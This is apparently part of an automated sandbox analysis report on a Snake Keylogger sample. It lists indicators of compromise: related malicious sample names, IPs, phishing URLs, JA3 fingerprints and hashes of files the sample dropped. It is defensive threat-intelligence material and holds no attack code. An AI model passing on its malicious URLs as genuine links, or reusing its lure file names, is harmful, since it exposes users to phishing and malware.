	po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	RFQ -SCHOTTEL Type SRP200.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
api.telegram.org	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	RFQ -SCHOTTEL Type SRP200.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
TELEGRAMRU	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_ios	Get hash	malicious	Unknown	Browse	104.22.54.104
	http://ek21-cl.asp.cuenote.jp/c/pvwyaadfke3Lf8bG	Get hash	malicious	Unknown	Browse	104.18.208.173
	https://www.canva.com/design/DAGSL2lLp_4/lQGTdiRa89y3fkgkaFc-uQ/edit?utm_content=DAGSL2lLp_4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	HTMLPhisher	Browse	172.64.144.96
	Bank Payment $38,735.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	172.67.216.244
	ORDER ENQUIRY.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Shipping Documents.xls	Get hash	malicious	Remcos	Browse	172.67.216.244
	po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://u47214858.ct.sendgrid.net/ls/click?upn=u001.c4dv-2BqJoebtefwT8NPLgxJhEAMFjIETH3I3Q8CNmlUyiUmttbZn0qPd3YBU1FvM-2FTPZQ0Ny-2FjdR-2FE-2F7zRj1y6P-2FWlxAyLuXYXbYHvhJ5g8KGiVmaicte80xV-2Bl3IZC9tXXFR_qqk8pzmFTqXgUqmijN8NLgkwBDr0C-2Barb6A8p6EP2vzfFIYXQXZPUsC69-2F89CrBr6pqEhlk-2Bm2kXZ9T2yO-2F2wXq53tvBzsea7EyzJ8-2FeaRjYTKe8296LUx3dR165pmE81l4ZlyCckh6XAStB7X6mpZG1eDt2Z2hE9lreTf4zUu15BHkFWIQD6l06j98sSmxefpIhKrPbp1sHqorvnsLfTlqgy97iDW5x7jEFHBjvW3kB67l3ddnWvdhOAQtXJjvxkBTHzOZ1xmNB-2F-2BJv2yxw-2BZ118sFXhzW7kT0jCD4nVA53ptg-2FlDPfE3xlZZV9CMctrTJ1N8IAj5d062XIpZOe3B3qxw6lRc-2FlE4u0JOetbEvf0rjlMWcXfPEqpotI-2F2oVP9HyepyGLoftfNEm6SwBOFPsaNp7O-2BtHor7tHsI-2B0toVkv4rP0i-2Br0nrtV4hMR-2FdhpHoJiQMDnEQt4HkwhputltaAXkVwiAgeKUBKMe5BZPlwbFaY695vWxuBA8sXYlfIlA2nH2OTZtq4olwBYb-2B2OH7O0v7kh9lZbdG-2FR7aHKFdYLoQNSTKRWoXOCWruqXPTLLwScg4q6t45M9fA06bOcDeidFPVNDK-2FWFzDkHMQLFcxNpkS3T2MKWPAPYmVVSF-2FYvR-2FCjme44RBe4WqMVRDyINtH-2BCgXVuhmhyhlxqnQJQ3khWyNBODdBzIgWx7SJHQER1-2BQIENitwqgFbxnEHVgdtauGxq3b7b9C-2BkO-2BOeMHOIaRwA-2BSx45dj5rG-2BfMrbH9xwp2AcUmYUCFe15mQPKLSUbdkG53z-2BRi6KQYCNPyauzai9f2rlpGdEnSU7g8yhbiAHqaWchhGFREcCHEMvyZXxkCNwEjj7wKionbQnEVTNY1chMS4frV68nYnZpRS4eFq1F-2BziFy5Fu7I-2BEGiv2g-3D-3D	Get hash	malicious	Unknown	Browse	188.114.97.3
SERVERCENTRALUS	https://aws.predictiveresponse.net/fwdhs.htm?redirect=https://shermsco.com/umtdby0g5ztccrxs-790065	Get hash	malicious	Unknown	Browse	216.246.112.38
	http://www.tiktokchat.shop/	Get hash	malicious	Unknown	Browse	75.102.49.249
	http://fullgasesspa.cl	Get hash	malicious	Unknown	Browse	216.246.46.105
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	66.225.201.22
	https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	216.246.46.21
	https://login0fficemailverify.laiora.cfd/ilog.htm	Get hash	malicious	Unknown	Browse	205.234.232.49
	https://sharingfile.mirbrth.click/fileshare/index.html	Get hash	malicious	HTMLPhisher	Browse	205.234.232.50
	yq5xNPpWCT.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	216.246.46.43
	UDxMi3I3lO.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	50.31.176.135
	https://document.hsll2.store/klog.htm#neo.matrix2044@outlook.com	Get hash	malicious	Unknown	Browse	205.234.232.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	po110-11#U3000Sip_KAHRAMANKAZAN AS %100% S51105P-E01 #Uff08fiyati teklifi#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://azgop.org/	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	https://l.facebook.com/l.php?u=https%3A%2F%2Fglossydollyknock.com%2Fw4n3hka2p6%3Fkey%3D4adf7f60948fc97f20eb71a37f488b68%26fbclid%3DIwZXh0bgNhZW0CMTAAAR2sWCkriUyPdlHfdRTPbCt2g8yn2B0gn49apZn-9YDDT6mmSsMKBb63wBg_aem_LHXLb0b6XyEafa9vMdu15Q&h=AT3Q5pc4JYuZUEyX8rr8abFazLnrJX82c0Mzs4joBZygkyzWKVOG4MfAjLuQ9vGazIv4IV-N-QhihzSx2jrkeAjehZSm2YhcT1T0Hz7uxtZvtRIbuTkA_Am76OeQhuopaQ&__tn__=R%5D-R&c%5B0%5D=AT0B8CUrOUWDDhBkBSoY_sR_Q2IdaQRs5o-hIRLRUlMk669issrBSNbduA-V2UNVUT_XZ9QJcwePs_4iUMdBe8WDu2kbum__cQyKqnoqtSz4-dHASRwGlJAYUngRXsgxmoYUj9q1YNGw0-hNPPtRpfV-WyB5ptMMsMbm355vN9Vz8k6D9ZXB_vjILzh8k0OO_w_zawh-IINi5cndpF3-4aGCWeoOMMG3q1NB8mKT_pQljubmHEwtBLrB3RTViT2btvA	Get hash	malicious	Anonymous Proxy	Browse	149.154.167.220
	Bank Payment $38,735.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	149.154.167.220
	18000012550_20240930_0078864246#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	149.154.167.220
	A 413736796#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	149.154.167.220
	Scanned Purchase List.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_AcEnrS.exe_2dc6f3615384b0b820f49419bdfb62c78a16395_3aa1fe28_e2f6bfb4-8e3b-4930-9192-70b04bf6ea22\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.085432106090856
Encrypted:	false
SSDEEP:	192:DeGM0xwgT0BU/1WPaace36izuiFpZ24IO8Df:tM0xwgABU/aaLVizuiFpY4IO87
MD5:	3848915534D7A865F03D3DF5C9D6CB74
SHA1:	530E27C20249A7EECC981240E5B9493FC50EB398
SHA-256:	3F4EBA416D4F2E0E85D95B4A299EEFE09C57CA2C3B049718AB153AEA6CF67449
SHA-512:	3A868CC00432EFCBCAFE1648A12F622F44013CED8A52AFBFEE64FA6A2B83822891DB542BE854C83C00913E0A918FE23EA9A107A5A3ED628D987949D5EB68D3AB
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.2.4.6.5.1.9.0.5.3.1.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.2.4.6.5.1.9.7.2.5.0.3.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.f.6.b.f.b.4.-.8.e.3.b.-.4.9.3.0.-.9.1.9.2.-.7.0.b.0.4.b.f.6.e.a.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.c.7.2.c.5.b.-.8.e.e.b.-.4.b.9.f.-.9.d.1.6.-.b.f.f.3.c.4.9.c.6.e.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.c.E.n.r.S...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.J.L.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.1.c.-.0.0.0.1.-.0.0.1.4.-.e.7.3.7.-.1.1.9.b.d.f.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.5.9.8.a.c.2.f.4.2.3.5.6.2.d.8.6.b.e.6.f.5.4.9.6.8.4.a.7.e.1.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.4.2.b.0.a.7.e.2.0.7.7.e.c.a.3.8.b.9.b.6.f.f.1.6.d.8.9.7.2.2.c.b.b.b.f.7.0.0.2.!.A.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D66.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Oct 1 08:55:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	273870
Entropy (8bit):	3.6743977209943766
Encrypted:	false
SSDEEP:	3072:xy17d4uEqE8JsLTgjVuyvaGfmqbTypy34y:xmd4CcTgRiGO2TMy3
MD5:	4F55EAA3EC9A79264DF05961935A6337
SHA1:	BAB77F3E2B7125E98ED9B201CD90A2FC39129A3F
SHA-256:	389CE505539A076CFA8E7649ECE09C45E9D7829B187E22FC97EE45643F7EE871
SHA-512:	DDFABE2A1F4FCFDA41968E161C96A97DD65282D90E75999F508549A10945D63B9814C9BEBE3A566C8654945C44C9165EC8398F788A457CE554899D472EF1488B
Malicious:	false
Preview:	MDMP..a..... ..........f............D...............X.......T....#......D%..FS..........`.......8...........T............<..............D$..........0&..............................................................................eJ.......&......GenuineIntel............T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6304
Entropy (8bit):	3.722183081134401
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbhZ6gCeYV4xuQE/fM8PfZ5aM4UQ89bGhsfOCm:R6l7wVeJhZ6gtYV40bprQ89bGhsfOCm
MD5:	2B3F34311AC909F22DE31253E2DC7EFC
SHA1:	9FD4CF572C837BB3BB0D699EE1986075B43CE120
SHA-256:	1A6B51CE25C512A26D969ECA2A80423D63B1939C19E8B7095A9B303B69888B15
SHA-512:	3B6D8E648C537F413358E4DE2081A6D3C8A9B839D89B3A6694EC7B968BC269E8CCDD1E809764C1DF961A1EC6B74761D88FBDCCEE6339B2384467CF1295927EAA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F2D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.4775600851790625
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI96VWpW8VYcYm8M4JfjFY+q87x08Tk1uv9cvd:uIjf9I7Qk7V8JKc08T99cvd
MD5:	FBC5BAB5B97BAC52210E56C94508CDC9
SHA1:	311D078E706A3DF16BDB0260D6FD07E0F9630311
SHA-256:	D194039BA2901D5546D1EF77C82A8015081AF58F4F38CD1F05DAA49BCB243854
SHA-512:	B5B04A09C8D01BB8E69AC0646928D034B83A8523292FAB0826398F9A5F4187A2290B6262FDB274A798C05EBDDDE17144858203CB0F81F23B66F2E69A7FFF5590
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="524158" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AcEnrS.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\AcEnrS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WIpGif4IRrFfamQ.exe.log

Download File

Process:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_141esvdq.2sr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
